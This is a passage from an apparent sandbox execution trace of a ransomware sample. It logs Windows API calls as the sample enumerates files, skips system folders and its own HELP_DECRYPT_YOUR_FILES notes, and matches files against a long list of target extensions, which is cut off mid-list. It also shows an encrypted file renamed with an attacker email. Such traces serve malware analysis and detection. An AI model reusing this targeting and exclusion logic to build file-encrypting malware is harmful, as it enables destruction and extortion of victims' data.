	[0172.836] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0172.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.836] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0172.836] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0172.836] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0172.836] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8088f595, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="..", cAlternateFileName="")) returned 1
	[0172.837] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0172.837] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8088f595, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8088f595, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x808b5795, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0172.837] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808694b3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x808694b3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8088f595, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0172.837] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa214da47, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa214da47, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa2173cb2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xbd7, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0172.837] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2199f29, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2199f29, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa2199f29, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x720, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0172.837] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa21c0195, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa21c0195, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x905, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1
	[0172.838] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa21c0195, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa21c0195, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x905, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 0
	[0172.838] FindClose (in: hFindFile=0xfb95f0 | out: hFindFile=0xfb95f0) returned 1
	[0172.839] FindClose (in: hFindFile=0xfb95f0 | out: hFindFile=0xfb95f0) returned 0
	[0172.839] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x807aa70f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x807aa70f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x807aa70f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x250, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0172.839] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x807aa70f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x807aa70f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x807aa70f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x250, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0172.839] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0172.840] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0172.840] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0172.840] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0172.840] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0172.841] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", cAlternateFileName="{7A30A~1")) returned 1
	[0172.841] lstrcmpW (lpString1="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="..") returned 1
	[0172.841] lstrcmpW (lpString1="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2=".") returned 1
	[0172.841] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0172.841] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0172.841] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{7a30a9be-737f-47a1-a541-6e7b0761ed19}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}"
	[0172.841] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}"
	[0172.842] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\"
	[0172.842] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\"
	[0172.842] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*"
	[0172.842] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0172.848] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*") returned 84
	[0172.848] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.849] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*") returned 0x54
	[0172.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.849] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="windows") returned 0x0
	[0172.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.849] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="boot") returned 0x0
	[0172.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="system volume information") returned 0x0
	[0172.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="temp") returned 0x0
	[0172.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="program files") returned 0x0
	[0172.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="appdata") returned 0x0
	[0172.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="application data") returned 0x0
	[0172.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="winnt") returned 0x0
	[0172.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="tmp") returned 0x0
	[0172.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="cache") returned 0x0
	[0172.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.853] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="webcache") returned 0x0
	[0172.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.854] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="inetcache") returned 0x0
	[0172.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.854] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="nvidia") returned 0x0
	[0172.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.854] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="packages") returned 0x0
	[0172.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.854] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="cookies") returned 0x0
	[0172.855] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.855] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="programdata") returned 0x0
	[0172.855] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0172.855] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c629f3, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1c629f3, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1c88c62, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1f35, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0172.855] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0172.855] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0172.855] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\"
	[0172.855] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"
	[0172.856] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml") returned 99
	[0172.856] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.856] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml") returned 0x63
	[0172.856] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.856] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.856] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"
	[0172.856] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml") returned 99
	[0172.856] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.857] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0172.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.857] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2